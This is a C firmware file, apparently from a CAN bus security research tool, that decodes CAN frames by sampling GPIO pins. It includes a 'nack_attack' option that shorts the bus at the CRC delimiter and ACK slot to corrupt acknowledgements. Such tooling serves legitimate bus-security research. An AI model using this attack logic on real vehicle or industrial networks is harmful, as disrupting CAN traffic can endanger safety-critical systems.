==> bitbane/CANT/reCANT_SW/source/CANT/can.c <==
#include <stdio.h>
#include "can.h"
#include <stdbool.h>
#include "fsl_pit.h"
#include "peripherals.h"
#include "fsl_iomuxc.h"
#include "usb.h"
#include "led.h"
#define SHORT_ON BOARD_INITPINS_CAN1_SW_PORT->DR |= 1 << BOARD_INITPINS_CAN1_SW_PIN
#define SHORT_OFF BOARD_INITPINS_CAN1_SW_PORT->DR |= ~(1 << BOARD_INITPINS_CAN1_SW_PIN)

void can_init()
{

    /* Enable interrupts from channel 0. */
    PIT_EnableInterrupts(PIT_PERIPHERAL, PIT_CHANNEL_0, kPIT_TimerInterruptEnable);
    /* Enable interrupts from channel 1. */
    PIT_EnableInterrupts(PIT_PERIPHERAL, PIT_CHANNEL_1, kPIT_TimerInterruptEnable);
    /* Enable interrupt PIT_IRQN request in the NVIC */
    EnableIRQ(PIT_IRQn);

    
    /* Set timer1 callback handler */
    timer1_callback_handler = NULL;

    /* Reconfigure CAN1 pins to GPIO with an interrupt on RX */
    gpio_pin_config_t Output_config = {
        .direction = kGPIO_DigitalOutput,
        .outputLogic = 0U,
        .interruptMode = kGPIO_NoIntmode
    };
    /* Initialize GPIO functionality on GPIO_AD_B1_08 (pin H13) CAN1_TX */
    GPIO_PinInit(GPIO1, 24U, &Output_config);
    IOMUXC_SetPinMux(IOMUXC_GPIO_AD_B1_08_GPIO1_IO24, 0U); 
    IOMUXC_SetPinConfig(IOMUXC_GPIO_AD_B1_08_GPIO1_IO24, 0x30B0U); 

    gpio_pin_config_t Input_config = {
        .direction = kGPIO_DigitalInput,
        .outputLogic = 0U,
        .interruptMode = kGPIO_IntRisingOrFallingEdge
    };

    /* Initialize GPIO functionality on GPIO_AD_B1_09 (pin M13) */
    GPIO_PinInit(GPIO1, 25U, &Input_config);
    /* Enable GPIO pin interrupt on GPIO_AD_B1_09 (pin M13) */
    GPIO_PortEnableInterrupts(GPIO1, 1U << 25U);

    IOMUXC_SetPinMux(IOMUXC_GPIO_AD_B1_09_GPIO1_IO25, 0U); 
    IOMUXC_SetPinConfig(IOMUXC_GPIO_AD_B1_09_GPIO1_IO25, 0x0130B1U); 
}

void can_sync()
{
    PIT_SetTimerPeriod(PIT_PERIPHERAL, PIT_CHANNEL_1, can_ticks_per_cycle >> 1);
    timer1_callback_handler = sync_callback;
    synchronized = 0;
    same_bits_count = 0;

    // Enable timer and interrupt
    PIT_StartTimer(PIT_PERIPHERAL, PIT_CHANNEL_1);

    write_string("Synchronizing CAN bus...");
    while(!synchronized);
    write_string("Done\r\n");

    // Enable the external interrupt on the RX pin
    EnableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);
}

static void sync_callback(void)
{
    /* Check to see if we are getting a 1 */
    if((GPIO1->DR & CAN_RX_PIN) > 0)
        same_bits_count++;
    else
        same_bits_count = 0;

    if(same_bits_count >= 14)
    {
        synchronized = 1;
        can_timer_stop();
    }
}

static void sample_callback(void)
{
    uint16_t bit_read = 0;
    if (GPIO1->DR & CAN_RX_PIN)
        bit_read = 1;

    /* Check to see if this is a stuff bit */
    if (same_bits_count >= 5) /* This is a stuff bit or an error frame */
    {
        if(bit_read == last_bit) // If we're reading the same bit a 6th time, this is an error frame
        {
            bits_read = 255; // This will effectively end the processing for this message and we will start over with the next one
        }
        else // Different bit level is for a stuff bit
        {
            // But don't forget that stuff bits count for the 5 same levels in a row
            same_bits_count = 1;
            last_bit = bit_read;
        }
    }
        
    else /* Not a stuff bit */
    {
        bits_read++;

        /* Track consecutive bits */
        if(bit_read == last_bit)
            same_bits_count++;
        else
            same_bits_count = 1;
        last_bit = bit_read;

        /* Populate the correct item based on position */
        // bit 1 is SOF, ignore it
        if(bits_read >= 2 && bits_read <= 12)
        {
            arbid <<= 1;
            arbid |= bit_read;
        }

        // bit 13 remote transmission request
        else if(bits_read == 14)
            extended_arbid = bit_read;

        /* From here, message length is based on whether or not we have an extended identifier. */
        if(extended_arbid == 0 && bits_read > 14)
        {
            // bit 15 is reserved
            if(bits_read >= 16 && bits_read <= 19)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 20 && bits_read < (20 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 20 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (20 + (8 * msg_len)) && bits_read < (35 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;

                if(bits_read == (34 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (35 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_on;
            }
            else if(bits_read == (36 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_off;
            }
            // else if(bits_read == (37 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (38 + (8 * msg_len))) && (bits_read < (45 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (45 + (8 * msg_len))) && (bits_read < (48 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
        else if (bits_read > 14)
        {
            if(bits_read >= 15 && bits_read <= 32)
            {
                arbid <<= 1;
                arbid |= bit_read;
            }
            // bit 33 is remote transmission request
            // bits 34 and 35 are reserved
            else if(bits_read >= 36 && bits_read <= 39)
            {
                msg_len <<= 1;
                msg_len |= bit_read;
            }
            else if(bits_read >= 40 && bits_read < (40 + (8 * msg_len)))
            {
                message[msg_byte] <<= 1;
                message[msg_byte] |= bit_read;

                if(bits_read - 40 - (msg_byte * 8) >= 7)
                    msg_byte++;
            }
            else if(bits_read >= (40 + (8 * msg_len)) && bits_read < (55 + (8 * msg_len)))
            {
                can_rx_crc <<= 1;
                can_rx_crc |= bit_read;
                if(bits_read == (54 + (8 * msg_len))) // Last bit of the CRC
                {
                    /* There is no bit stuffing for the CRC delimiter, ACK slot, or ACK delimiter */
                    same_bits_count = 0;
                }
            }
            else if(bits_read == (55 + (8 * msg_len))) // This is the CRC Delimiter
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_on;
            }
            else if(bits_read == (56 + (8 * msg_len))) // This is the ACK slot
            {
                if(nack_attack > 0)
                    timer0_callback_handler = short_off;
            }
            // else if(bits_read == (57 + (8 * msg_len))) // This is the ACK Delimiter
            // else if((bits_read >= (58 + (8 * msg_len))) && (bits_read < (65 + (8 * msg_len)))) // End Of Frame bits
            // else if((bits_read >= (65 + (8 * msg_len))) && (bits_read < (68 + (8 * msg_len)))) // Inter Frame Segment TODO: Not presently accounting for overload frames
        }
    }
    /* Currently skipping the EOF Header */
    if((extended_arbid == 0 && bits_read >= (20 + 18 + (8 * msg_len))) ||
       (extended_arbid == 1 && bits_read >= (40 + 18 + (8 * msg_len))))
    {
        can_timer_stop();
        // Enable the external interrupt on the RX pin
        frame_done = 1;
        frames_seen++;
        same_bits_count = 1;
        bits_read = 1;
        last_bit = 0;
 
        // Enable the external interrupt on the RX pin
        EnableIRQ(GPIO1_GPIO_COMB_16_31_IRQN);

        if(end_of_frame_callback != NULL)
            end_of_frame_callback();
    }
}

void can_timer_stop()
{
    /* Disable the overflow interrupt and timer */
    PIT_StopTimer(PIT_PERIPHERAL, PIT_CHANNEL_1);

    /* Disable the callback */
    timer1_callback_handler = NULL;
}
